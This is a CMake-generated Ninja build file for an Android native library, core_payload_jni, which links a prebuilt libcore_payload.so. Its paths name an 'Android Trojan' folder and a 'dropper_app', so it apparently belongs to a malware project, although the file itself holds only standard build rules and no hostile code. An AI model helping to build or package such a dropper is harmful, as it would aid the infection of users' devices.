# CMAKE generated file: DO NOT EDIT!
# Generated by "Ninja" Generator, CMake Version 3.22

# This file contains all the build statements describing the
# compilation DAG.

# =============================================================================
# Write statements declared in CMakeLists.txt:
# 
# Which is the root file.
# =============================================================================

# =============================================================================
# Project: core_payload_jni
# Configurations: Debug
# =============================================================================

#############################################
# Minimal version of Ninja required by this file

ninja_required_version = 1.5


#############################################
# Set configuration variable for custom commands.

CONFIGURATION = Debug
# =============================================================================
# Include auxiliary files.


#############################################
# Include rules file.

include CMakeFiles/rules.ninja

# =============================================================================

#############################################
# Logical path to working directory; prefix for absolute paths.

cmake_ninja_workdir = /Users/rezaflutt/Android$ Trojan/Hermes_Spectre_Edition/dropper_app/app/.cxx/Debug/2394v101/arm64-v8a/
# =============================================================================
# Object build statements for SHARED_LIBRARY target core_payload_jni


#############################################
# Order-only phony target for core_payload_jni

build cmake_object_order_depends_target_core_payload_jni: phony || CMakeFiles/core_payload_jni.dir

build CMakeFiles/core_payload_jni.dir/core_payload_jni.cpp.o: CXX_COMPILER__core_payload_jni_Debug /Users/rezaflutt/Android$ Trojan/Hermes_Spectre_Edition/dropper_app/app/src/main/cpp/core_payload_jni.cpp || cmake_object_order_depends_target_core_payload_jni
  DEFINES = -Dcore_payload_jni_EXPORTS
  DEP_FILE = CMakeFiles/core_payload_jni.dir/core_payload_jni.cpp.o.d
  FLAGS = -g -DANDROID -fdata-sections -ffunction-sections -funwind-tables -fstack-protector-strong -no-canonical-prefixes -D_FORTIFY_SOURCE=2 -Wformat -Werror=format-security   -fno-limit-debug-info  -fPIC
  INCLUDES = -I"/Users/rezaflutt/Android Trojan/Hermes_Spectre_Edition/dropper_app/app/src/main/cpp"
  OBJECT_DIR = CMakeFiles/core_payload_jni.dir
  OBJECT_FILE_DIR = CMakeFiles/core_payload_jni.dir


# =============================================================================
# Link build statements for SHARED_LIBRARY target core_payload_jni


#############################################
# Link the shared library /Users/rezaflutt/Android Trojan/Hermes_Spectre_Edition/dropper_app/app/build/intermediates/cxx/Debug/2394v101/obj/arm64-v8a/libcore_payload_jni.so

build /Users/rezaflutt/Android$ Trojan/Hermes_Spectre_Edition/dropper_app/app/build/intermediates/cxx/Debug/2394v101/obj/arm64-v8a/libcore_payload_jni.so: CXX_SHARED_LIBRARY_LINKER__core_payload_jni_Debug CMakeFiles/core_payload_jni.dir/core_payload_jni.cpp.o | /Users/rezaflutt/Android$ Trojan/Hermes_Spectre_Edition/dropper_app/app/src/main/jniLibs/arm64-v8a/libcore_payload.so
  LANGUAGE_COMPILE_FLAGS = -g -DANDROID -fdata-sections -ffunction-sections -funwind-tables -fstack-protector-strong -no-canonical-prefixes -D_FORTIFY_SOURCE=2 -Wformat -Werror=format-security   -fno-limit-debug-info
  LINK_FLAGS = -Wl,--build-id=sha1 -Wl,--no-rosegment -Wl,--no-undefined-version -Wl,--fatal-warnings -Wl,--no-undefined -Qunused-arguments
  LINK_LIBRARIES = -lcore_payload  -landroid  -llog  -latomic -lm
  LINK_PATH = -L"/Users/rezaflutt/Android Trojan/Hermes_Spectre_Edition/dropper_app/app/src/main/jniLibs/arm64-v8a"
  OBJECT_DIR = CMakeFiles/core_payload_jni.dir
  POST_BUILD = :
  PRE_LINK = :
  SONAME = libcore_payload_jni.so
  SONAME_FLAG = -Wl,-soname,
  TARGET_FILE = "/Users/rezaflutt/Android Trojan/Hermes_Spectre_Edition/dropper_app/app/build/intermediates/cxx/Debug/2394v101/obj/arm64-v8a/libcore_payload_jni.so"
  TARGET_PDB = core_payload_jni.so.dbg


#############################################
# Utility command for edit_cache

build CMakeFiles/edit_cache.util: CUSTOM_COMMAND
  COMMAND = cd "/Users/rezaflutt/Android Trojan/Hermes_Spectre_Edition/dropper_app/app/.cxx/Debug/2394v101/arm64-v8a" && /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/bin/ccmake -S"/Users/rezaflutt/Android Trojan/Hermes_Spectre_Edition/dropper_app/app/src/main/cpp" -B"/Users/rezaflutt/Android Trojan/Hermes_Spectre_Edition/dropper_app/app/.cxx/Debug/2394v101/arm64-v8a"
  DESC = Running CMake cache editor...
  pool = console
  restat = 1

build edit_cache: phony CMakeFiles/edit_cache.util


#############################################
# Utility command for rebuild_cache

build CMakeFiles/rebuild_cache.util: CUSTOM_COMMAND
  COMMAND = cd "/Users/rezaflutt/Android Trojan/Hermes_Spectre_Edition/dropper_app/app/.cxx/Debug/2394v101/arm64-v8a" && /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/bin/cmake --regenerate-during-build -S"/Users/rezaflutt/Android Trojan/Hermes_Spectre_Edition/dropper_app/app/src/main/cpp" -B"/Users/rezaflutt/Android Trojan/Hermes_Spectre_Edition/dropper_app/app/.cxx/Debug/2394v101/arm64-v8a"
  DESC = Running CMake to regenerate build system...
  pool = console
  restat = 1

build rebuild_cache: phony CMakeFiles/rebuild_cache.util

# =============================================================================
# Target aliases.

build core_payload_jni: phony /Users/rezaflutt/Android$ Trojan/Hermes_Spectre_Edition/dropper_app/app/build/intermediates/cxx/Debug/2394v101/obj/arm64-v8a/libcore_payload_jni.so

build libcore_payload_jni.so: phony /Users/rezaflutt/Android$ Trojan/Hermes_Spectre_Edition/dropper_app/app/build/intermediates/cxx/Debug/2394v101/obj/arm64-v8a/libcore_payload_jni.so

# =============================================================================
# Folder targets.

# =============================================================================

#############################################
# Folder: /Users/rezaflutt/Android Trojan/Hermes_Spectre_Edition/dropper_app/app/.cxx/Debug/2394v101/arm64-v8a

build all: phony /Users/rezaflutt/Android$ Trojan/Hermes_Spectre_Edition/dropper_app/app/build/intermediates/cxx/Debug/2394v101/obj/arm64-v8a/libcore_payload_jni.so

# =============================================================================
# Built-in targets


#############################################
# Re-run CMake if any of its inputs changed.

build build.ninja: RERUN_CMAKE | /Users/rezaflutt/Android$ Trojan/Hermes_Spectre_Edition/dropper_app/app/src/main/cpp/CMakeLists.txt /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/CMakeCInformation.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/CMakeCXXInformation.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/CMakeCommonLanguageInclude.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/CMakeGenericSystem.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/CMakeInitializeConfigs.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/CMakeLanguageInformation.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/CMakeSystemSpecificInformation.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/CMakeSystemSpecificInitialize.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Compiler/CMakeCommonCompilerMacros.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Compiler/Clang-C.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Compiler/Clang-CXX.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Compiler/Clang.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Compiler/GNU.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Platform/Android-Clang-C.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Platform/Android-Clang-CXX.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Platform/Android-Clang.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Platform/Android-Initialize.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Platform/Android.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Platform/Linux.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Platform/UnixPaths.cmake /Users/rezaflutt/Library/Android/sdk/ndk/29.0.13846066/build/cmake/abis.cmake /Users/rezaflutt/Library/Android/sdk/ndk/29.0.13846066/build/cmake/android-legacy.toolchain.cmake /Users/rezaflutt/Library/Android/sdk/ndk/29.0.13846066/build/cmake/android.toolchain.cmake /Users/rezaflutt/Library/Android/sdk/ndk/29.0.13846066/build/cmake/flags.cmake /Users/rezaflutt/Library/Android/sdk/ndk/29.0.13846066/build/cmake/hooks/pre/Android-Clang.cmake /Users/rezaflutt/Library/Android/sdk/ndk/29.0.13846066/build/cmake/hooks/pre/Android-Initialize.cmake /Users/rezaflutt/Library/Android/sdk/ndk/29.0.13846066/build/cmake/hooks/pre/Android.cmake /Users/rezaflutt/Library/Android/sdk/ndk/29.0.13846066/build/cmake/platforms.cmake CMakeCache.txt CMakeFiles/3.22.1-g37088a8/CMakeCCompiler.cmake CMakeFiles/3.22.1-g37088a8/CMakeCXXCompiler.cmake CMakeFiles/3.22.1-g37088a8/CMakeSystem.cmake
  pool = console


#############################################
# A missing CMake input file is not an error.

build /Users/rezaflutt/Android$ Trojan/Hermes_Spectre_Edition/dropper_app/app/src/main/cpp/CMakeLists.txt /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/CMakeCInformation.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/CMakeCXXInformation.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/CMakeCommonLanguageInclude.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/CMakeGenericSystem.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/CMakeInitializeConfigs.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/CMakeLanguageInformation.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/CMakeSystemSpecificInformation.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/CMakeSystemSpecificInitialize.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Compiler/CMakeCommonCompilerMacros.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Compiler/Clang-C.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Compiler/Clang-CXX.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Compiler/Clang.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Compiler/GNU.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Platform/Android-Clang-C.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Platform/Android-Clang-CXX.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Platform/Android-Clang.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Platform/Android-Initialize.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Platform/Android.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Platform/Linux.cmake /Users/rezaflutt/Library/Android/sdk/cmake/3.22.1/share/cmake-3.22/Modules/Platform/UnixPaths.cmake /Users/rezaflutt/Library/Android/sdk/ndk/29.0.13846066/build/cmake/abis.cmake /Users/rezaflutt/Library/Android/sdk/ndk/29.0.13846066/build/cmake/android-legacy.toolchain.cmake /Users/rezaflutt/Library/Android/sdk/ndk/29.0.13846066/build/cmake/android.toolchain.cmake /Users/rezaflutt/Library/Android/sdk/ndk/29.0.13846066/build/cmake/flags.cmake /Users/rezaflutt/Library/Android/sdk/ndk/29.0.13846066/build/cmake/hooks/pre/Android-Clang.cmake /Users/rezaflutt/Library/Android/sdk/ndk/29.0.13846066/build/cmake/hooks/pre/Android-Initialize.cmake /Users/rezaflutt/Library/Android/sdk/ndk/29.0.13846066/build/cmake/hooks/pre/Android.cmake /Users/rezaflutt/Library/Android/sdk/ndk/29.0.13846066/build/cmake/platforms.cmake CMakeCache.txt CMakeFiles/3.22.1-g37088a8/CMakeCCompiler.cmake CMakeFiles/3.22.1-g37088a8/CMakeCXXCompiler.cmake CMakeFiles/3.22.1-g37088a8/CMakeSystem.cmake: phony


#############################################
# Clean all the built files.

build clean: CLEAN


#############################################
# Print all primary targets available.

build help: HELP


#############################################
# Make the all target the default.

default all
